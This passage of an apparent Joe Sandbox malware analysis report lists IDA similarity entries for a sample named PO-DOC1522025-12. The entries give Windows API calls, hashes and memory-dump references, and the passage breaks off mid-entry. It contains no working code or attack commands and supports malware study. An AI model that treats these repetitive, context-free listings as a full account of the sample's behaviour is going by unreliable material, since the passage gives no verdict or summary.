                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                    • String ID:
                                                                                    • API String ID: 1539411459-0
                                                                                    • Opcode ID: 5972598863771347024d7ecb5e83b5da2e19f153e91eedbd9d7645405c2582ab
                                                                                    • Instruction ID: 9378d8a142e007910f83493a8c1b00e891066800d780456f1f2909d8200b8f03
                                                                                    • Opcode Fuzzy Hash: 5972598863771347024d7ecb5e83b5da2e19f153e91eedbd9d7645405c2582ab
                                                                                    • Instruction Fuzzy Hash: B4F03A3A046299FADB125F94AC0DFCA3B59AF16311F048002FA11651E1CB755561DFE5
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 001598CC
                                                                                    • SetTextColor.GDI32(?,?), ref: 001598D6
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 001598E9
                                                                                    • GetStockObject.GDI32(00000005), ref: 001598F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ModeObjectStockText
                                                                                    • String ID:
                                                                                    • API String ID: 4037423528-0
                                                                                    • Opcode ID: 3418e80532398347235d1ac238895dc4385aca7fbbc96b99a09d582552087ebb
                                                                                    • Instruction ID: bd73a60f5cafb77630cdbaa122297ca273fc1f9e3a5397edc2a2b14d23a5b62c
                                                                                    • Opcode Fuzzy Hash: 3418e80532398347235d1ac238895dc4385aca7fbbc96b99a09d582552087ebb
                                                                                    • Instruction Fuzzy Hash: C8E06D31246291EAEF215B74BC0DBE83F21AB52336F04871AF6FA584E1C3714680DB11
                                                                                    APIs
                                                                                    • GetCurrentThread.KERNEL32 ref: 001A1634
                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,001A11D9), ref: 001A163B
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001A11D9), ref: 001A1648
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,001A11D9), ref: 001A164F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                    • String ID:
                                                                                    • API String ID: 3974789173-0
                                                                                    • Opcode ID: 66ad14f2796259376129af5997427e640f3aee19375349e381345db5394a2b72
                                                                                    • Instruction ID: 03398e7d9fc27fdaf1273539c10448ca221e33a86297dbd0844ff1dad2326a1d
                                                                                    • Opcode Fuzzy Hash: 66ad14f2796259376129af5997427e640f3aee19375349e381345db5394a2b72
                                                                                    • Instruction Fuzzy Hash: 6BE08635603212EBD7201FF09E0DB473B7CAF557A1F144C09F245C9080D7744480C790
                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 0019D858
                                                                                    • GetDC.USER32(00000000), ref: 0019D862
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0019D882
                                                                                    • ReleaseDC.USER32(?), ref: 0019D8A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: 2d7110bddd3612dbe3324d80481a8101e310fb9602983ec747d4b2b797cad437
                                                                                    • Instruction ID: 440fbc9afcbe89b910fb8ee4d88f1fc10cf8eaeedc8292e3416fa4e7ea6b9ff9
                                                                                    • Opcode Fuzzy Hash: 2d7110bddd3612dbe3324d80481a8101e310fb9602983ec747d4b2b797cad437
                                                                                    • Instruction Fuzzy Hash: BAE01AB4802206DFCF419FA4D80866DBBB1FB08311F15880AF806E7750C7389985EF80
                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 0019D86C
                                                                                    • GetDC.USER32(00000000), ref: 0019D876
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0019D882
                                                                                    • ReleaseDC.USER32(?), ref: 0019D8A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: ec0e2d33c0415f80698f0f1a1646f5be5802a584069800bb54cc9b999dac4ddd
                                                                                    • Instruction ID: fa30728835824eee6c17c608ebbdb1ac2f17e4b52fc3c376c1403429ec368ebd
                                                                                    • Opcode Fuzzy Hash: ec0e2d33c0415f80698f0f1a1646f5be5802a584069800bb54cc9b999dac4ddd
                                                                                    • Instruction Fuzzy Hash: 1FE01A74802201DFCB509FA4D80866DBBB1FB08311B14880AF806E7750C7389945DF80
                                                                                    APIs
                                                                                      • Part of subcall function 00147620: _wcslen.LIBCMT ref: 00147625
                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 001B4ED4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Connection_wcslen
                                                                                    • String ID: *$LPT
                                                                                    • API String ID: 1725874428-3443410124
                                                                                    • Opcode ID: 2434d24e8962eccc571b2650076b76b33369583792e5a9e57bee3d785a964706
                                                                                    • Instruction ID: edf992a8f91b6359f39ecbf46afe38b3249f2554dbaac33e98868413c299c199
                                                                                    • Opcode Fuzzy Hash: 2434d24e8962eccc571b2650076b76b33369583792e5a9e57bee3d785a964706
                                                                                    • Instruction Fuzzy Hash: 73914B75A002149FDB14DF58C484EAABBF1AF49304F19C09DE84A9F3A2D735EE85CB91
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(0019569E,00000000,?,001DCC08,?,00000000,00000000), ref: 001C78DD
                                                                                      • Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A
                                                                                    • CharUpperBuffW.USER32(0019569E,00000000,?,001DCC08,00000000,?,00000000,00000000), ref: 001C783B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper$_wcslen
                                                                                    • String ID: <s
                                                                                    • API String ID: 3544283678-3981233947
                                                                                    • Opcode ID: 73794bb3ba6d0fed2879eb5608b8d2d41f0d587ad6ff1f9730c5a4dd31e25bff
                                                                                    • Instruction ID: 79dcd3f0ebccd62e6a4644d38705aea9e85817070d1dacfff80994505d432fe5
                                                                                    • Opcode Fuzzy Hash: 73794bb3ba6d0fed2879eb5608b8d2d41f0d587ad6ff1f9730c5a4dd31e25bff
                                                                                    • Instruction Fuzzy Hash: E2612C72914219AACF04EFA4DC91EFDB378BF38704B444529E642A71A1EB749A05DBA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #
                                                                                    • API String ID: 0-1885708031
                                                                                    • Opcode ID: 25001c2692a854771408bebcb8020dea610fbfbddb2ba2c3f6a619f8615e5d3d
                                                                                    • Instruction ID: 4fd751cba138a7330bc0acd0be9d1aa34a5b009be2be51fcd19d8e376f29c185
                                                                                    • Opcode Fuzzy Hash: 25001c2692a854771408bebcb8020dea610fbfbddb2ba2c3f6a619f8615e5d3d
                                                                                    • Instruction Fuzzy Hash: A051F175904246DFDF1DDFA8C481ABA7BE8EF25310F244055ECA19B2D0D7349E86CBA1
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000), ref: 0015F2A2
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0015F2BB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 2783356886-2766056989
                                                                                    • Opcode ID: 863f091553ad633069fae15b091466f19517cfc7ddd43567f04c4c81fda5f47b
                                                                                    • Instruction ID: 659161b1cd7652ae21756b8b40f7e5be5de4ae2daea8594422abecc8d1c7ea3f
                                                                                    • Opcode Fuzzy Hash: 863f091553ad633069fae15b091466f19517cfc7ddd43567f04c4c81fda5f47b
                                                                                    • Instruction Fuzzy Hash: 47515671409744ABD320AF54DC86BABBBF8FF95300F81884DF1D9421A5EB318569CB67
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001C57E0
                                                                                    • _wcslen.LIBCMT ref: 001C57EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                    • String ID: CALLARGARRAY
                                                                                    • API String ID: 157775604-1150593374
                                                                                    • Opcode ID: f4bfb70589bd6d52fbe91a7ba3c02738b0969457693786f3e45eb5595a8da160
                                                                                    • Instruction ID: 379e4c822782dd35716905ba69c05f0e43dc12fd52167ab200217ec40317c00e
                                                                                    • Opcode Fuzzy Hash: f4bfb70589bd6d52fbe91a7ba3c02738b0969457693786f3e45eb5595a8da160
                                                                                    • Instruction Fuzzy Hash: 0E418E31E002099FCB14DFA9C885DAEBBB6EF69354F14406DF515AB291E730ED81CBA0
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 001BD130
                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001BD13A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CrackInternet_wcslen
                                                                                    • String ID: |
                                                                                    • API String ID: 596671847-2343686810
                                                                                    • Opcode ID: 6fa9f0f0f6c970f267d9c186d920203ecd45f833ada8c66928e2d97ecb5aa5e8
                                                                                    • Instruction ID: 6a7bd4e7d086c8662589adf74576558c44498e963331e79414c19ebbb02d119c
                                                                                    • Opcode Fuzzy Hash: 6fa9f0f0f6c970f267d9c186d920203ecd45f833ada8c66928e2d97ecb5aa5e8
                                                                                    • Instruction Fuzzy Hash: D1313C71D01219ABCF15EFA4DC85AEEBFB9FF19304F100059F815B6162EB31AA56CB60
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 001D3621
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001D365C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$DestroyMove
                                                                                    • String ID: static
                                                                                    • API String ID: 2139405536-2160076837
                                                                                    • Opcode ID: d7268bc74fdf09ec64ade0bc541aa612cdd53ebda98ab3001ee79a4ea8a7541c
                                                                                    • Instruction ID: cb7f381069775604c49a01d96454f3bf01bb6bcfe29fa577e6d49c0204f64b55
                                                                                    • Opcode Fuzzy Hash: d7268bc74fdf09ec64ade0bc541aa612cdd53ebda98ab3001ee79a4ea8a7541c
                                                                                    • Instruction Fuzzy Hash: 3531BC71100204AEDB209F28DC80EFB73A9FF98760F00861AF8A597290DB31ED81D7A1
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 001D461F
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001D4634
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: '
                                                                                    • API String ID: 3850602802-1997036262
                                                                                    • Opcode ID: 38ea29b4d31ddc00a1ca803a8631c5d401984aeb55b878dc4379c2779c31fd6b
                                                                                    • Instruction ID: aee73bf6bab2029c860e0b673304cc6a80c798a655c974afcac832b749f32750
                                                                                    • Opcode Fuzzy Hash: 38ea29b4d31ddc00a1ca803a8631c5d401984aeb55b878dc4379c2779c31fd6b
                                                                                    • Instruction Fuzzy Hash: EC312574A0130A9FDB14CFA9D981BDABBB6FF09300F10406AE905AB391D770E941CF90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001D327C
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001D3287
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Combobox
                                                                                    • API String ID: 3850602802-2096851135
                                                                                    • Opcode ID: 46d1c70c3a34c8c9a761fd1e470ec8220453c5e11ee4a8d1d421fa254d1a5b35
                                                                                    • Instruction ID: a694430c8b82da6dbf0c2e29f4bb3b96782ac6010dd070609ad1bdd72f90dd8b
                                                                                    • Opcode Fuzzy Hash: 46d1c70c3a34c8c9a761fd1e470ec8220453c5e11ee4a8d1d421fa254d1a5b35
                                                                                    • Instruction Fuzzy Hash: 7011B271B002087FFF259E54DC85EFB3B6AEB943A4F10412AF92897390D7719D518761
                                                                                    APIs
                                                                                      • Part of subcall function 0014600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0014604C
                                                                                      • Part of subcall function 0014600E: GetStockObject.GDI32(00000011), ref: 00146060
                                                                                      • Part of subcall function 0014600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0014606A
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001D377A
                                                                                    • GetSysColor.USER32(00000012), ref: 001D3794
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                    • String ID: static
                                                                                    • API String ID: 1983116058-2160076837
                                                                                    • Opcode ID: 579583ca90fb1c9dccc968f06c04f6ed08f0e3cc4c70fe6937f5eae64e466c4d
                                                                                    • Instruction ID: 0a8c7f53e4ceb40714af694478847ac6d8098c6d7ee18f057249c2e47e2994a2
                                                                                    • Opcode Fuzzy Hash: 579583ca90fb1c9dccc968f06c04f6ed08f0e3cc4c70fe6937f5eae64e466c4d
                                                                                    • Instruction Fuzzy Hash: 2A113AB261060AAFDF01DFA8CC46EEA7BB8FB08354F014916F965E3250D735E851DB60
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001BCD7D
                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001BCDA6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$OpenOption
                                                                                    • String ID: <local>
                                                                                    • API String ID: 942729171-4266983199
                                                                                    • Opcode ID: ae05a815d39d979dc19507aef3a3835fe3c05545b210632ede5ecdbd8f3d1944
                                                                                    • Instruction ID: d8f93eabb95142019fd16a26bf92ec38239a1e359d82f522369b809bbd949d7d
                                                                                    • Opcode Fuzzy Hash: ae05a815d39d979dc19507aef3a3835fe3c05545b210632ede5ecdbd8f3d1944
                                                                                    • Instruction Fuzzy Hash: 9E11C279205632BAD7384BA6CC89FE7BEACEF527A4F40422AF14983080D7709840D6F0
                                                                                    APIs
                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 001D34AB
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001D34BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                    • String ID: edit
                                                                                    • API String ID: 2978978980-2167791130
                                                                                    • Opcode ID: 6fb16ae88c82e252dc0f7657912d5097931449a780b19e77422f509b5ae61877
                                                                                    • Instruction ID: 1f1964c8c35dc84e7e6df508088c55b38d3552c03a3f9c4bf653667300c3e960
                                                                                    • Opcode Fuzzy Hash: 6fb16ae88c82e252dc0f7657912d5097931449a780b19e77422f509b5ae61877
                                                                                    • Instruction Fuzzy Hash: 69118F71101108AFEF124E68EC44AEB376AEB15378F504726F971932E0C779DC91D752
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 001A6CB6
                                                                                    • _wcslen.LIBCMT ref: 001A6CC2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
